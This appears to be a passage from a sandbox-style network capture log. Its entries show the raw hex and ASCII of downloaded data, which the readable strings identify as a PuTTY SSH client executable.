2023-10-05 16:48:06 UTC	828	IN	Data Raw: 00 01 00 00 00 02 00 00 00 01 00 00 00 01 00 00 00 03 00 00 00 03 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 02 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 02 00 00 00 03 00 00 00 03 00 00 00 01 00 00 00 01 00 00 00 02 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 02 00 00 00 04 00 00 00 04 00 00 00 03 00 00 00 02 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 02 00 00 00 02 00 00 00 04 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 03 00 00 00 02 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 01 00 00 00 03 00 00 00 01 00 00 00 01 00 00 00 03 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 Data Ascii:
2023-10-05 16:48:06 UTC	836	IN	Data Raw: 00 29 01 c9 1e 11 01 f1 1e f2 00 f3 00 f4 00 f5 00 cf 1e cd 1e e5 1e f9 00 fa 00 69 01 e7 1e fd 00 e3 1e ee 1e a0 00 a1 00 a2 00 a3 00 fd ff a5 00 fd ff a7 00 a4 00 a9 00 aa 00 ab 00 fd ff fd ff fd ff fd ff b0 00 b1 00 b2 00 b3 00 fd ff b5 00 b6 00 b7 00 fd ff b9 00 ba 00 bb 00 bc 00 bd 00 fd ff bf 00 c0 00 c1 00 c2 00 c3 00 c4 00 c5 00 c6 00 c7 00 c8 00 c9 00 ca 00 cb 00 cc 00 cd 00 ce 00 cf 00 fd ff d1 00 d2 00 d3 00 d4 00 d5 00 d6 00 52 01 d8 00 d9 00 da 00 db 00 dc 00 78 01 fd ff df 00 e0 00 e1 00 e2 00 e3 00 e4 00 e5 00 e6 00 e7 00 e8 00 e9 00 ea 00 eb 00 ec 00 ed 00 ee 00 ef 00 fd ff f1 00 f2 00 f3 00 f4 00 f5 00 f6 00 53 01 f8 00 f9 00 fa 00 fb 00 fc 00 ff 00 fd ff fd ff c7 00 fc 00 e9 00 e2 00 e4 00 e0 00 05 01 e7 00 ea 00 eb 00 e8 00 ef 00 ee 00 Data Ascii: )iRxS
2023-10-05 16:48:06 UTC	844	IN	Data Raw: 00 33 84 4e 00 33 84 4e 00 91 83 4e 00 e5 84 4e 00 7e 82 4e 00 aa a8 4e 00 c9 85 4e 00 90 87 4e 00 66 82 4e 00 83 85 4e 00 f3 a7 4e 00 1c 1e 4e 00 1c 1e 4e 00 1c 1e 4e 00 1c 1e 4e 00 1c 1e 4e 00 1c 1e 4e 00 1c 1e 4e 00 6a 8a 4e 00 85 89 4e 00 41 a8 4e 00 5c 81 4e 00 29 af 4e 00 55 af 4e 00 ef 8d 4e 00 d9 a6 4e 00 4d 82 4e 00 9c 85 4e 00 7d a8 4e 00 50 ee 44 00 70 ee 44 00 f0 ee 44 00 30 ef 44 00 90 ef 44 00 b0 ef 44 00 a0 f0 44 00 00 00 00 00 d0 f0 44 00 00 f1 44 00 60 f1 44 00 b0 f1 44 00 d0 f1 44 00 f0 f1 44 00 50 f2 44 00 70 c4 42 00 60 f2 44 00 74 4f 4d 00 94 4f 4d 00 d8 4f 4d 00 58 51 4d 00 90 f3 44 00 f0 f3 44 00 80 fe 44 00 c0 fe 44 00 a0 72 42 00 ff ff ff ff 00 03 45 00 70 03 45 00 a0 72 42 00 90 03 45 00 b0 03 45 00 d0 03 45 00 e0 03 45 00 f0 03 Data Ascii: 3N3NNN~NNNNfNNNNNNNNNNjNNAN\N)NUNNNMNN}NPDpDD0DDDDDD`DDDDPDpB`DtOMOMOMXQMDDDDrBEpErBEEEE
2023-10-05 16:48:06 UTC	852	IN	Data Raw: ef b1 75 85 e9 02 23 26 dc 88 1b 65 eb 81 3e 89 23 c5 ac 96 d3 f3 6f 6d 0f 39 42 f4 83 82 44 0b 2e 04 20 84 a4 4a f0 c8 69 5e 9b 1f 9e 42 68 c6 21 9a 6c e9 f6 61 9c 0c 67 f0 88 d3 ab d2 a0 51 6a 68 2f 54 d8 28 a7 0f 96 a3 33 51 ab 6c 0b ef 6e e4 3b 7a 13 50 f0 3b ba 98 2a fb 7e 1d 65 f1 a1 76 01 af 39 3e 59 ca 66 88 0e 43 82 19 86 ee 8c b4 9f 6f 45 c3 a5 84 7d be 5e 8b 3b d8 75 6f e0 73 20 c1 85 9f 44 1a 40 a6 6a c1 56 62 aa d3 4e 06 77 3f 36 72 df fe 1b 3d 02 9b 42 24 d7 d0 37 48 12 0a d0 d3 ea 0f db 9b c0 f1 49 c9 72 53 07 7b 1b 99 80 d8 79 d4 25 f7 de e8 f6 1a 50 fe e3 3b 4c 79 b6 bd e0 6c 97 ba 06 c0 04 b6 4f a9 c1 c4 60 9f 40 c2 9e 5c 5e 63 24 6a 19 af 6f fb 68 b5 53 6c 3e eb b2 39 13 6f ec 52 3b 1f 51 fc 6d 2c 95 30 9b 44 45 81 cc 09 bd 5e af 04 d0 Data Ascii: u#&e>#om9BD. Ji^Bh!lagQjh/T(3Qln;zP;*~ev9>YfCoE}^;uos D@jVbNw?6r=B$7HIrS{y%P;LylO`@\^c$johSl>9oR;Qm,0DE^
2023-10-05 16:48:07 UTC	860	IN	Data Raw: 00 90 a7 48 00 b0 a7 48 00 e0 aa 48 00 f0 aa 48 00 10 ab 48 00 80 af 48 00 a0 af 48 00 80 b7 48 00 10 b8 48 00 20 b8 48 00 20 b9 48 00 60 b9 48 00 70 b9 48 00 a7 30 4e 00 5e c2 4e 00 f4 7e 4d 00 01 00 00 00 20 74 4d 00 1c 81 4d 00 02 00 00 00 24 81 4d 00 03 00 00 00 30 81 4d 00 01 00 00 00 f2 30 4e 00 3d c5 4e 00 10 9d 48 00 a0 9d 48 00 30 9e 48 00 a0 a3 48 00 20 a4 48 00 40 a4 48 00 70 a4 48 00 a0 a4 48 00 d0 a4 48 00 f0 a4 48 00 70 a7 48 00 90 a7 48 00 b0 a7 48 00 e0 aa 48 00 f0 aa 48 00 10 ab 48 00 80 af 48 00 a0 af 48 00 80 b7 48 00 10 b8 48 00 20 b8 48 00 20 b9 48 00 60 b9 48 00 70 b9 48 00 f2 30 4e 00 31 c5 4e 00 88 7f 4d 00 01 00 00 00 b0 74 4d 00 1c 81 4d 00 02 00 00 00 24 81 4d 00 03 00 00 00 30 81 4d 00 01 00 00 00 3d 31 4e 00 15 cd 4e 00 10 9d Data Ascii: HHHHHHHHH H H`HpH0N^N~M tMM$M0M0N=NHH0HH H@HpHHHHpHHHHHHHHHH H H`HpH0N1NMtMM$M0M=1NN
2023-10-05 16:48:07 UTC	868	IN	Data Raw: 76 32 21 4c 2e 32 cd 13 3e b4 91 fe 70 36 d9 5c bb 85 97 14 42 fd 1a cc 46 f8 dd 38 e6 d2 87 07 69 17 d1 02 1a fe f1 b5 3e ae ab b9 c3 6f ee 08 1c be 02 00 00 00 00 00 40 aa c2 40 81 d9 77 f8 2c 3d d7 e1 71 98 2f e7 d5 09 63 51 72 dd 19 a8 af 46 5a 2a d6 ce dc 02 2a fe dd 46 ce 8d 24 13 27 ad d2 23 b7 19 bb 04 c4 2b cc 06 b7 ca eb b1 47 dc 4b 09 9d ca 02 dc c5 8e 51 e6 31 80 56 c3 8e a8 58 2f 34 42 1e 04 8b 14 e5 bf fe 13 fc ff 05 0f 79 63 67 fd 36 d5 66 76 50 e1 b9 62 06 00 00 00 61 b0 67 1a 0a 01 d2 c0 e1 05 d0 3b 73 12 db 3f 2e 9f a3 e2 9d b2 61 e2 dc 63 2a bc 04 26 94 9b d5 70 61 96 25 e3 c2 b9 75 0b 14 21 2c 1d 1f 60 6a 13 b8 a2 3b d2 89 73 7d f1 60 df d7 ca c6 2b df 69 06 37 87 b8 24 ed 06 93 66 eb 6e 49 19 6f db 8d 93 75 82 74 5e 36 9a 6e c5 31 b7 Data Ascii: v2!L.2>p6\BF8i>o@@w,=q/cQrFZ*F$'#+GKQ1VX/4Bycg6fvPbag;s?.ac&pa%u!,`j;s}`+i7$fnIout^6n1
2023-10-05 16:48:07 UTC	875	IN	Data Raw: 00 4e 04 00 00 e8 c1 4f 00 4f 04 00 00 4c c2 4f 00 50 04 00 00 d0 c1 4f 00 52 04 00 00 84 c5 4f 00 56 04 00 00 58 c0 4f 00 57 04 00 00 18 c2 4f 00 5a 04 00 00 b0 be 4f 00 65 04 00 00 50 bf 4f 00 6b 04 00 00 9c c1 4f 00 6c 04 00 00 b4 c5 4f 00 81 04 00 00 68 be 4f 00 01 08 00 00 e8 c0 4f 00 04 08 00 00 70 c2 4f 00 07 08 00 00 dc c3 4f 00 09 08 00 00 90 c5 4f 00 0a 08 00 00 14 bf 4f 00 0c 08 00 00 08 c5 4f 00 10 08 00 00 c4 c3 4f 00 13 08 00 00 14 c5 4f 00 14 08 00 00 1c c1 4f 00 16 08 00 00 c0 bf 4f 00 1a 08 00 00 88 b0 4f 00 1d 08 00 00 68 c3 4f 00 2c 08 00 00 70 b4 4f 00 3b 08 00 00 70 c4 4f 00 3e 08 00 00 7c c2 4f 00 43 08 00 00 58 b4 4f 00 6b 08 00 00 5c c5 4f 00 01 0c 00 00 0c c4 4f 00 04 0c 00 00 2c c3 4f 00 07 0c 00 00 0c c0 4f 00 09 0c 00 00 a8 bf Data Ascii: NOOLOPOROVXOWOZOePOkOlOhOOpOOOOOOOOOOhO,pO;pO>\|OCXOk\OO,OO
2023-10-05 16:48:07 UTC	883	IN	Data Raw: 6f 6e 61 6c 20 74 65 78 74 20 64 69 73 70 6c 61 79 00 58 20 61 75 74 68 6f 72 69 74 79 20 66 69 6c 65 20 66 6f 72 20 6c 6f 63 61 6c 20 64 69 73 70 6c 61 79 00 58 31 31 44 69 73 70 6c 61 79 00 63 6f 6e 66 69 67 2d 6e 6f 64 65 6c 61 79 00 54 43 50 4e 6f 44 65 6c 61 79 00 70 75 62 6c 69 63 5f 61 66 66 69 6e 65 5f 79 00 70 75 62 6c 69 63 5f 79 00 4c 69 6e 75 78 00 61 75 78 00 2d 64 65 6d 6f 2d 63 6f 6e 66 69 67 2d 62 6f 78 00 50 75 54 54 59 43 6f 6e 66 69 67 42 6f 78 00 75 6e 69 78 00 64 69 73 70 6c 61 79 20 6e 61 6d 65 20 27 25 73 27 20 68 61 73 20 6e 6f 20 27 3a 6e 75 6d 62 65 72 27 20 73 75 66 66 69 78 00 67 73 73 61 70 69 2d 6b 65 79 65 78 00 4c 6f 63 61 6c 5c 70 75 74 74 79 2d 63 6f 6e 6e 73 68 61 72 65 2d 6d 75 74 65 78 00 4e 54 52 55 20 50 72 69 6d 65 Data Ascii: onal text displayX authority file for local displayX11Displayconfig-nodelayTCPNoDelaypublic_affine_ypublic_yLinuxaux-demo-config-boxPuTTYConfigBoxunixdisplay name '%s' has no ':number' suffixgssapi-keyexLocal\putty-connshare-mutexNTRU Prime
2023-10-05 16:48:07 UTC	891	IN	Data Raw: 76 65 64 20 53 65 73 73 69 6f 6e 73 00 53 61 26 76 65 64 20 53 65 73 73 69 6f 6e 73 00 43 68 61 6e 67 65 20 74 68 65 20 6e 75 6d 62 65 72 20 6f 66 20 72 6f 77 73 20 61 6e 64 20 63 6f 6c 75 6d 6e 73 00 43 6f 6c 75 6d 6e 73 00 63 6f 6e 66 69 67 2d 70 72 6f 78 79 2d 64 6e 73 00 74 72 61 6e 73 00 43 74 72 6c 53 68 69 66 74 49 6e 73 00 49 6e 69 74 43 6f 6d 6d 6f 6e 43 6f 6e 74 72 6f 6c 73 00 50 61 73 74 65 43 6f 6e 74 72 6f 6c 73 00 53 68 61 72 69 6e 67 20 61 6e 20 53 53 48 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 74 77 65 65 6e 20 50 75 54 54 59 20 74 6f 6f 6c 73 00 4c 6f 67 69 6e 20 64 65 74 61 69 6c 73 00 54 65 72 6d 69 6e 61 6c 20 64 65 74 61 69 6c 73 00 43 6f 6e 6e 65 63 74 69 6f 6e 2f 53 53 48 2f 54 75 6e 6e 65 6c 73 00 52 65 70 6c 69 65 73 20 74 6f 20 Data Ascii: ved SessionsSa&ved SessionsChange the number of rows and columnsColumnsconfig-proxy-dnstransCtrlShiftInsInitCommonControlsPasteControlsSharing an SSH connection between PuTTY toolsLogin detailsTerminal detailsConnection/SSH/TunnelsReplies to
2023-10-05 16:48:07 UTC	899	IN	Data Raw: 57 53 41 53 74 61 72 74 75 70 00 55 73 65 72 20 61 62 6f 72 74 65 64 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 73 65 74 75 70 00 44 6f 69 6e 67 20 44 69 66 66 69 65 2d 48 65 6c 6c 6d 61 6e 20 6b 65 79 20 65 78 63 68 61 6e 67 65 20 75 73 69 6e 67 20 25 64 2d 62 69 74 20 6d 6f 64 75 6c 75 73 20 61 6e 64 20 68 61 73 68 20 25 73 20 77 69 74 68 20 61 20 73 65 72 76 65 72 2d 73 75 70 70 6c 69 65 64 20 67 72 6f 75 70 00 75 73 69 6e 67 2d 63 6c 65 61 6e 75 70 00 57 53 41 43 6c 65 61 6e 75 70 00 73 75 70 64 75 70 00 53 63 72 6f 6c 6c 4f 6e 44 69 73 70 00 63 6f 6e 66 69 67 2d 61 6c 77 61 79 73 6f 6e 74 6f 70 00 69 6e 65 74 5f 6e 74 6f 70 00 45 6e 73 75 72 65 20 77 69 6e 64 6f 77 20 69 73 20 61 6c 77 61 79 73 20 6f 6e 20 74 6f 70 00 71 6f 70 00 6c 6f 6f 70 00 4c 6f 6f 70 Data Ascii: WSAStartupUser aborted connection setupDoing Diffie-Hellman key exchange using %d-bit modulus and hash %s with a server-supplied groupusing-cleanupWSACleanupsupdupScrollOnDispconfig-alwaysontopinet_ntopEnsure window is always on topqoploopLoop
2023-10-05 16:48:07 UTC	907	IN	Data Raw: 74 65 6d 4d 65 74 72 69 63 73 46 6f 72 44 70 69 00 63 6f 6e 66 69 67 2d 73 73 68 2d 6b 69 00 73 75 70 64 75 70 2d 61 73 63 69 69 00 63 6f 6e 66 69 67 2d 66 65 61 74 75 72 65 73 2d 62 69 64 69 00 44 69 73 61 62 6c 65 42 69 64 69 00 41 72 67 6f 6e 32 69 00 2d 69 00 63 6f 6e 66 69 67 2d 73 73 68 2d 62 75 67 2d 72 73 61 2d 73 68 61 32 2d 63 65 72 74 2d 75 73 65 72 61 75 74 68 00 73 73 68 2d 75 73 65 72 61 75 74 68 00 42 75 67 52 53 41 53 48 41 32 43 65 72 74 55 73 65 72 61 75 74 68 00 63 6f 6e 66 69 67 2d 73 73 68 2d 6e 6f 61 75 74 68 00 63 6f 6e 66 69 67 2d 73 73 68 2d 6e 6f 74 72 69 76 69 61 6c 61 75 74 68 00 63 6f 6e 66 69 67 2d 73 73 68 2d 78 31 31 61 75 74 68 00 63 6f 6e 66 69 67 2d 70 72 6f 78 79 2d 61 75 74 68 00 2d 6e 6f 2d 74 72 69 76 69 61 6c 2d 61 Data Ascii: temMetricsForDpiconfig-ssh-kisupdup-asciiconfig-features-bidiDisableBidiArgon2i-iconfig-ssh-bug-rsa-sha2-cert-userauthssh-userauthBugRSASHA2CertUserauthconfig-ssh-noauthconfig-ssh-notrivialauthconfig-ssh-x11authconfig-proxy-auth-no-trivial-a
2023-10-05 16:48:07 UTC	914	IN	Data Raw: 72 61 6e 73 69 65 6e 74 20 68 6f 73 74 20 6b 65 79 20 63 61 63 68 65 00 41 63 63 65 70 74 69 6e 67 20 63 65 72 74 69 66 69 65 64 20 68 6f 73 74 20 6b 65 79 20 61 6e 79 77 61 79 20 62 61 73 65 64 20 6f 6e 20 63 61 63 68 65 00 66 20 76 61 6c 75 65 20 72 65 63 65 69 76 65 64 20 69 73 20 74 6f 6f 20 6c 61 72 67 65 00 70 6f 72 74 20 6e 75 6d 62 65 72 20 74 6f 6f 20 6c 61 72 67 65 00 50 61 67 65 61 6e 74 20 66 61 69 6c 65 64 20 74 6f 20 61 6e 73 77 65 72 20 63 68 61 6c 6c 65 6e 67 65 00 52 65 63 65 69 76 65 64 20 43 72 79 70 74 6f 43 61 72 64 20 63 68 61 6c 6c 65 6e 67 65 00 52 65 63 65 69 76 65 64 20 54 49 53 20 63 68 61 6c 6c 65 6e 67 65 00 52 65 63 65 69 76 65 64 20 52 53 41 20 63 68 61 6c 6c 65 6e 67 65 00 4f 70 74 69 6f 6e 73 20 63 6f 6e 74 72 6f 6c 6c 69 Data Ascii: ransient host key cacheAccepting certified host key anyway based on cachef value received is too largeport number too largePageant failed to answer challengeReceived CryptoCard challengeReceived TIS challengeReceived RSA challengeOptions controlli
2023-10-05 16:48:07 UTC	922	IN	Data Raw: 25 64 00 43 6f 6e 6e 65 63 74 69 6e 67 20 74 6f 20 25 73 20 70 72 6f 78 79 20 61 74 20 25 73 20 70 6f 72 74 20 25 64 00 25 73 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 74 6f 20 25 73 20 70 6f 72 74 20 25 64 00 43 6f 6e 6e 65 63 74 69 6e 67 20 74 6f 20 25 73 20 70 6f 72 74 20 25 64 00 53 65 72 76 65 72 20 73 65 6e 74 20 63 6f 6d 6d 61 6e 64 20 65 78 69 74 20 73 74 61 74 75 73 20 25 64 00 53 65 73 73 69 6f 6e 20 73 65 6e 74 20 63 6f 6d 6d 61 6e 64 20 65 78 69 74 20 73 74 61 74 75 73 20 25 64 00 55 73 69 6e 67 20 53 53 48 20 70 72 6f 74 6f 63 6f 6c 20 76 65 72 73 69 6f 6e 20 25 64 00 73 69 67 6e 61 6c 20 25 64 00 53 4f 43 4b 53 20 70 72 6f 78 79 20 72 65 73 70 6f 6e 73 65 20 69 6e 63 6c 75 64 65 64 20 75 6e 6b 6e 6f 77 6e 20 61 64 64 72 65 73 73 20 74 79 70 65 20 Data Ascii: %dConnecting to %s proxy at %s port %d%s connection to %s port %dConnecting to %s port %dServer sent command exit status %dSession sent command exit status %dUsing SSH protocol version %dsignal %dSOCKS proxy response included unknown address type
2023-10-05 16:48:07 UTC	930	IN	Data Raw: 46 38 35 41 36 45 31 45 34 43 37 41 42 46 35 41 45 38 43 44 42 30 39 33 33 44 37 31 45 38 43 39 34 45 30 34 41 32 35 36 31 39 44 43 45 45 33 44 32 32 36 31 41 44 32 45 45 36 42 46 31 32 46 46 41 30 36 44 39 38 41 30 38 36 34 44 38 37 36 30 32 37 33 33 45 43 38 36 41 36 34 35 32 31 46 32 42 31 38 31 37 37 42 32 30 30 43 42 42 45 31 31 37 35 37 37 41 36 31 35 44 36 43 37 37 30 39 38 38 43 30 42 41 44 39 34 36 45 32 30 38 45 32 34 46 41 30 37 34 45 35 41 42 33 31 34 33 44 42 35 42 46 43 45 30 46 44 31 30 38 45 34 42 38 32 44 31 32 30 41 39 33 41 44 32 43 41 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 00 30 78 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 43 39 30 46 44 41 41 32 32 31 36 38 43 32 33 34 43 34 43 36 36 32 38 42 38 30 44 43 31 43 44 31 32 Data Ascii: F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD12
2023-10-05 16:48:07 UTC	938	IN	Data Raw: 74 20 6b 65 79 20 66 69 6e 67 65 72 70 72 69 6e 74 20 69 73 3a 00 54 68 65 20 6e 65 77 20 25 73 20 6b 65 79 20 66 69 6e 67 65 72 70 72 69 6e 74 20 69 73 3a 00 54 68 65 20 73 65 72 76 65 72 27 73 20 25 73 20 6b 65 79 20 66 69 6e 67 65 72 70 72 69 6e 74 20 69 73 3a 00 41 70 70 6c 69 63 61 74 69 6f 6e 20 6b 65 79 70 61 64 20 73 65 74 74 69 6e 67 73 3a 00 43 68 61 72 61 63 74 65 72 20 63 6c 61 73 73 65 73 3a 00 45 6e 61 62 6c 65 20 65 78 74 72 61 20 6b 65 79 62 6f 61 72 64 20 66 65 61 74 75 72 65 73 3a 00 50 72 65 66 65 72 65 6e 63 65 20 6f 72 64 65 72 20 66 6f 72 20 47 53 53 41 50 49 20 6c 69 62 72 61 72 69 65 73 3a 00 54 68 65 20 68 6f 73 74 20 6b 65 79 20 69 73 20 6e 6f 74 20 63 61 63 68 65 64 20 66 6f 72 20 74 68 69 73 20 73 65 72 76 65 72 3a 00 54 68 65 Data Ascii: t key fingerprint is:The new %s key fingerprint is:The server's %s key fingerprint is:Application keypad settings:Character classes:Enable extra keyboard features:Preference order for GSSAPI libraries:The host key is not cached for this server:The
2023-10-05 16:48:07 UTC	946	IN	Data Raw: 64 20 66 6f 72 20 73 65 72 76 65 72 20 69 73 20 25 73 2c 20 62 65 6c 6f 77 20 77 61 72 6e 69 6e 67 20 74 68 72 65 73 68 6f 6c 64 2e 20 41 62 61 6e 64 6f 6e 69 6e 67 20 70 72 6f 78 79 20 53 53 48 20 63 6f 6e 6e 65 63 74 69 6f 6e 2e 00 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 77 61 73 20 74 72 69 76 69 61 6c 21 20 41 62 61 6e 64 6f 6e 69 6e 67 20 73 65 73 73 69 6f 6e 20 61 73 20 73 70 65 63 69 66 69 65 64 20 69 6e 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 00 25 73 3d 3d 4e 55 4c 4c 20 69 6e 20 74 65 72 6d 69 6e 61 6c 2e 63 0a 6c 69 6e 65 6e 6f 3d 25 64 20 79 3d 25 64 20 77 3d 25 64 20 68 3d 25 64 0a 63 6f 75 6e 74 28 73 63 72 6f 6c 6c 62 61 63 6b 3d 25 70 29 3d 25 64 0a 63 6f 75 6e 74 28 73 63 72 65 65 6e 3d 25 70 29 3d 25 64 0a 63 6f 75 6e 74 28 61 Data Ascii: d for server is %s, below warning threshold. Abandoning proxy SSH connection.Authentication was trivial! Abandoning session as specified in configuration.%s==NULL in terminal.clineno=%d y=%d w=%d h=%dcount(scrollback=%p)=%dcount(screen=%p)=%dcount(a
2023-10-05 16:48:07 UTC	953	IN	Data Raw: 2d 38 38 35 39 2d 37 3a 31 39 38 37 20 28 4c 61 74 69 6e 2f 47 72 65 65 6b 29 00 57 69 6e 31 32 35 33 20 28 47 72 65 65 6b 29 00 49 53 4f 2d 38 38 35 39 2d 31 31 3a 32 30 30 31 20 28 4c 61 74 69 6e 2f 54 68 61 69 29 00 57 69 6e 31 32 35 34 20 28 54 75 72 6b 69 73 68 29 00 49 53 4f 2d 38 38 35 39 2d 39 3a 31 39 39 39 20 28 4c 61 74 69 6e 2d 35 2c 20 54 75 72 6b 69 73 68 29 00 53 65 63 6f 6e 64 73 20 62 65 74 77 65 65 6e 20 6b 65 65 70 61 6c 69 76 65 73 20 28 30 20 74 6f 20 74 75 72 6e 20 6f 66 66 29 00 25 73 20 28 69 6e 61 63 74 69 76 65 29 00 53 49 47 54 45 52 4d 20 28 54 65 72 6d 69 6e 61 74 65 29 00 57 69 6e 31 32 35 38 20 28 56 69 65 74 6e 61 6d 65 73 65 29 00 49 6e 76 61 6c 69 64 20 6b 65 79 20 28 6e 6f 20 6b 65 79 20 74 79 70 65 29 00 49 53 4f 2d 38 Data Ascii: -8859-7:1987 (Latin/Greek)Win1253 (Greek)ISO-8859-11:2001 (Latin/Thai)Win1254 (Turkish)ISO-8859-9:1999 (Latin-5, Turkish)Seconds between keepalives (0 to turn off)%s (inactive)SIGTERM (Terminate)Win1258 (Vietnamese)Invalid key (no key type)ISO-8
2023-10-05 16:48:07 UTC	961	IN	Data Raw: 00 00 00 21 00 73 00 2d 00 3e 00 63 00 6f 00 6d 00 70 00 63 00 74 00 78 00 00 00 21 00 73 00 2d 00 3e 00 64 00 68 00 5f 00 63 00 74 00 78 00 00 00 21 00 73 00 2d 00 3e 00 63 00 72 00 63 00 64 00 61 00 5f 00 63 00 74 00 78 00 00 00 21 00 65 00 78 00 74 00 72 00 61 00 2d 00 3e 00 67 00 65 00 78 00 00 00 73 00 74 00 2d 00 3e 00 69 00 6e 00 64 00 65 00 78 00 20 00 3d 00 3d 00 20 00 68 00 77 00 2d 00 3e 00 69 00 6e 00 64 00 65 00 78 00 00 00 30 00 20 00 3c 00 3d 00 20 00 69 00 6e 00 64 00 65 00 78 00 00 00 74 00 65 00 72 00 6d 00 2d 00 3e 00 73 00 65 00 6c 00 65 00 6e 00 64 00 2e 00 78 00 20 00 3e 00 20 00 74 00 65 00 72 00 6d 00 2d 00 3e 00 63 00 75 00 72 00 73 00 2e 00 78 00 00 00 74 00 65 00 72 00 6d 00 2d 00 3e 00 73 00 65 00 6c 00 73 00 74 00 61 00 72 00 Data Ascii: !s->compctx!s->dh_ctx!s->crcda_ctx!extra->gexst->index == hw->index0 <= indexterm->selend.x > term->curs.xterm->selstar
2023-10-05 16:48:07 UTC	969	IN	Data Raw: 00 66 00 66 00 66 00 62 00 6b 00 39 00 6d 00 79 00 2f 00 70 00 75 00 74 00 74 00 79 00 2f 00 77 00 69 00 6e 00 64 00 6f 00 77 00 73 00 2f 00 6e 00 61 00 6d 00 65 00 64 00 2d 00 70 00 69 00 70 00 65 00 2d 00 63 00 6c 00 69 00 65 00 6e 00 74 00 2e 00 63 00 00 00 2f 00 68 00 6f 00 6d 00 65 00 2f 00 73 00 69 00 6d 00 6f 00 6e 00 2f 00 6d 00 65 00 6d 00 2f 00 2e 00 62 00 75 00 69 00 6c 00 64 00 2f 00 77 00 6f 00 72 00 6b 00 64 00 69 00 72 00 73 00 2f 00 62 00 6f 00 62 00 2d 00 66 00 66 00 66 00 62 00 6b 00 39 00 6d 00 79 00 2f 00 70 00 75 00 74 00 74 00 79 00 2f 00 73 00 73 00 68 00 2f 00 6b 00 65 00 78 00 32 00 2d 00 63 00 6c 00 69 00 65 00 6e 00 74 00 2e 00 63 00 00 00 2f 00 68 00 6f 00 6d 00 65 00 2f 00 73 00 69 00 6d 00 6f 00 6e 00 2f 00 6d 00 65 00 6d 00 Data Ascii: fffbk9my/putty/windows/named-pipe-client.c/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/ssh/kex2-client.c/home/simon/mem
2023-10-05 16:48:07 UTC	977	IN	Data Raw: 00 2e 00 62 00 75 00 69 00 6c 00 64 00 2f 00 77 00 6f 00 72 00 6b 00 64 00 69 00 72 00 73 00 2f 00 62 00 6f 00 62 00 2d 00 66 00 66 00 66 00 62 00 6b 00 39 00 6d 00 79 00 2f 00 70 00 75 00 74 00 74 00 79 00 2f 00 75 00 74 00 69 00 6c 00 73 00 2f 00 77 00 69 00 6c 00 64 00 63 00 61 00 72 00 64 00 2e 00 63 00 00 00 2f 00 68 00 6f 00 6d 00 65 00 2f 00 73 00 69 00 6d 00 6f 00 6e 00 2f 00 6d 00 65 00 6d 00 2f 00 2e 00 62 00 75 00 69 00 6c 00 64 00 2f 00 77 00 6f 00 72 00 6b 00 64 00 69 00 72 00 73 00 2f 00 62 00 6f 00 62 00 2d 00 66 00 66 00 66 00 62 00 6b 00 39 00 6d 00 79 00 2f 00 70 00 75 00 74 00 74 00 79 00 2f 00 73 00 73 00 68 00 72 00 61 00 6e 00 64 00 2e 00 63 00 00 00 2f 00 68 00 6f 00 6d 00 65 00 2f 00 73 00 69 00 6d 00 6f 00 6e 00 2f 00 6d 00 65 00 Data Ascii: .build/workdirs/bob-fffbk9my/putty/utils/wildcard.c/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/sshrand.c/home/simon/me
2023-10-05 16:48:07 UTC	985	IN	Data Raw: 00 78 00 2d 00 3e 00 77 00 5b 00 30 00 5d 00 20 00 26 00 20 00 31 00 00 00 6d 00 6f 00 64 00 75 00 6c 00 75 00 73 00 2d 00 3e 00 77 00 5b 00 30 00 5d 00 20 00 26 00 20 00 31 00 00 00 62 00 79 00 74 00 65 00 20 00 3d 00 3d 00 20 00 30 00 78 00 46 00 30 00 00 00 6c 00 6f 00 77 00 5f 00 64 00 69 00 67 00 69 00 74 00 20 00 3c 00 20 00 31 00 30 00 00 00 62 00 69 00 74 00 73 00 20 00 3c 00 20 00 30 00 78 00 31 00 30 00 30 00 30 00 30 00 00 00 78 00 20 00 3e 00 20 00 30 00 00 00 78 00 2d 00 3e 00 6e 00 77 00 20 00 3e 00 20 00 30 00 00 00 6d 00 6f 00 64 00 75 00 6c 00 75 00 73 00 2d 00 3e 00 6e 00 77 00 20 00 3e 00 20 00 30 00 00 00 6e 00 62 00 69 00 74 00 73 00 20 00 3e 00 20 00 30 00 00 00 6b 00 65 00 79 00 5f 00 6e 00 75 00 6d 00 62 00 65 00 72 00 20 00 3e 00 Data Ascii: x->w[0] & 1modulus->w[0] & 1byte == 0xF0low_digit < 10bits < 0x10000x > 0x->nw > 0modulus->nw > 0nbits > 0key_number >
